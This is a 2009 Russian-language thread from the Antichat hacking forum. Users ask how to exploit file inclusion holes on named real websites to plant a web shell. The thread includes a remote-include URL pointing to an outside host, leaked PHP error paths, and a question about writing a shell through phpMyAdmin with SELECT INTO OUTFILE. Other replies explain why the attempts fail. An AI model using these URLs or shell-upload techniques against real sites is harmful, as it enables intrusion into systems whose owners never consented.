ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.05.2009, 16:20
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Аааа, если так, то шелл отобразится по этом же адресу, то есть ты инклудишь свой шелл, на эту же страницу (http://wow.alania.net/?page=)
Пример:
Код:
http://www.jiznicechy.org/en/index.php?path=http://forum.antichat.ru
Последний раз редактировалось -m0rgan-; 06.05.2009 в 16:39..
|
|
|
06.05.2009, 20:01
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
-m0rgan-, плохой пример. Тут не инклюд, а фрейм.
|
|
|
|
06.05.2009, 21:54
|
|
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582
Репутация:
394
|
|
В общем у меня вопрос следующего рода:
есть сайт и есть доступ к phpmyadmin-у а когда пытаюсь залить шелл с помощью конструкции select into outfile выдает такой ответ #1045 - Access denied for user… собственно вопрос – что это значит? это типа у юзера не хватает прав или что? И что с этим можно сделать? И может, есть какой то другой способ залить шелл через phpmyadmin-а???
|
|
|
|
06.05.2009, 22:34
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
>>что это значит?
Да, у юзера нет прав.
>>что с этим можно сделать
Зайти под юзером у которого есть права
>>может, есть какой то другой способ залить шелл через phpmyadmin-а
Если нет прав на запись, то нет
Add:
Есть ещё уязвимости самого пыхадмина:
https://forum.antichat.ru/thread50669.html
Возможно тебе повезёт 
Последний раз редактировалось jokester; 06.05.2009 в 22:46..
|
|
|
|
06.05.2009, 23:14
|
|
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582
Репутация:
394
|
|
Сообщение от jokester
Add:
Есть ещё уязвимости самого пыхадмина:
https://forum.antichat.ru/thread50669.html
Возможно тебе повезёт сенкс!
|
|
|
|
06.05.2009, 23:52
|
|
Banned
Регистрация: 06.05.2009
Сообщений: 13
Провел на форуме:
20431
Репутация:
-2
|
|
Как это можно использовать?
/index.php?act=calendar&code=birthdays&y=2009&m=5&d =4
# user12 (19)
# user45 (21)
# user545 (17)
# user74 (22)
/index.php?act=calendar&code=birthdays&y[]=2009&m=5&d=4
# user587 (-1989)
# user577 (-1987)
# user5774 (-1991)
# user5546 (-1986)
|
|
|
|
07.05.2009, 00:04
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Поскажите как пользоваться?
http://wow.alania.net/?page=
Warning: include(./inc/.php) [function.include]: failed to open stream: No such file or directory in Y:\home\78.110.144.12\www\index.php on line 104
Warning: include() [function.include]: Failed opening './inc/.php' for inclusion (include_path='.;/usr/local/php5/PEAR') in Y:\home\78.110.144.12\www\index.php on line 104
|
|
|
|
07.05.2009, 00:11
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
как-как, молча:
http://forum.antichat.ru/thread12123.html
|
|
|
|
07.05.2009, 00:39
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Почему не сробатывает???
http://wow.alania.net/?page=http://gef48.narod.ru/antichat
|
|
|
|
07.05.2009, 00:43
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
потому что локальный инклуд, LFI:
./inc/ в начале стоит, видишь? http уже не проканает
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
